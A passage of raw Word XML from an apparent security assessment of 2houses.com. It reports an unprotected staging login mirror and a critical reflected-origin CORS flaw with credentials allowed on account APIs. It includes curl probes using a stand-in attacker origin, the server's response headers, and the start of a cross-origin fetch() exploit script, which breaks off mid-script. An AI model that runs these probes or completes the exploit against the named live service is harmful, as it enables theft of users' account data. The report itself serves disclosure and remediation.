                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Heroku-backed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts.staging.ldf.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>62.210.83.7 (Scaleway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection refused but DNS resolves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Comparing prod vs staging login pages, the HTML is byte-near-identical — same form, same Rails app, same Passenger version. Staging appears to be a full mirror of the production auth service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Production </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses Cloud66 US. Staging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses AWS Frankfurt — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>different region, different hosting provider, probably different firewall posture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attackers love staging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Staging environments typically have weaker rate limits, debug modes on, more verbose errors, sometimes test accounts with known credentials, and less monitoring. If staging auths against the same user database as prod (common when "staging" actually means "staging frontend pointing at prod DB"), an attacker can brute-force or test exploits on staging and apply working ones to prod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Staging database leak risk.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If staging has a copy of prod data (or worse, a pointer to prod), a vulnerability on staging compromises prod data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No apparent authentication gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in front of staging. Typical mitigations (IP allowlist, HTTP basic auth, Cloudflare access rule, VPN-only) are absent — the plain internet-facing login page loads for anyone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`ldf` subdomain prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — unexplained internal codename. Suggests a third environment in addition to staging. Attackers benefit from every environment variant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -sI https://accounts-staging.2houses.com/en/users/sign_in  # 200</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -sI https://landing.staging.2houses.com/                   # 302</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Put staging behind an IP allowlist or VPN.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The office, CI runners, and any agreed external tester get in; no one else.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Or gate with HTTP Basic Auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the edge. Cheap, easy, blocks indexers and opportunistic attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Or put Cloudflare Access in front</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an email-allowlisted identity provider.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirm staging does not read production data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If it does, this finding rises to High/Critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rotate any credentials that may have leaked into staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (env files, seed data, fixture passwords).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable indexing of staging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> disallow + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>noindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> meta. Right now staging may already appear in search engines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-003 — accounts.2houses.com reflects arbitrary Origin + allows credentials on /api/v1/* (confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Broken CORS / cross-origin credentialed request forgery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accounts.2houses.com/api/v1/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (at least </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/complete_authentication.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/check_registration.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/complete_registration.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirmed by single OPTIONS preflight on 2026-04-22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. No state-changing follow-up made.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>The probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ curl -sI -X OPTIONS \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H "Origin: https://evil.example.com" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H "Access-Control-Request-Method: POST" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H "Access-Control-Request-Headers: content-type" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    https://accounts.2houses.com/api/v1/complete_authentication.json</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>The response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 200</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>access-control-allow-origin:      https://evil.example.com     &lt;-- attacker origin reflected</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>access-control-allow-credentials: true                         &lt;-- cookies attached</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>access-control-allow-headers:     content-type</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>access-control-allow-methods:     GET, POST, OPTIONS, PUT, DELETE</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>access-control-max-age:           1728000                       &lt;-- 20 days cache</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>echoes any Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> header back in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, combined with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. This is a textbook reflective-origin CORS misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Exploit scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker publishes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>evil.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a page that contains:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     fetch('https://accounts.2houses.com/api/v1/complete_registration.json', {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
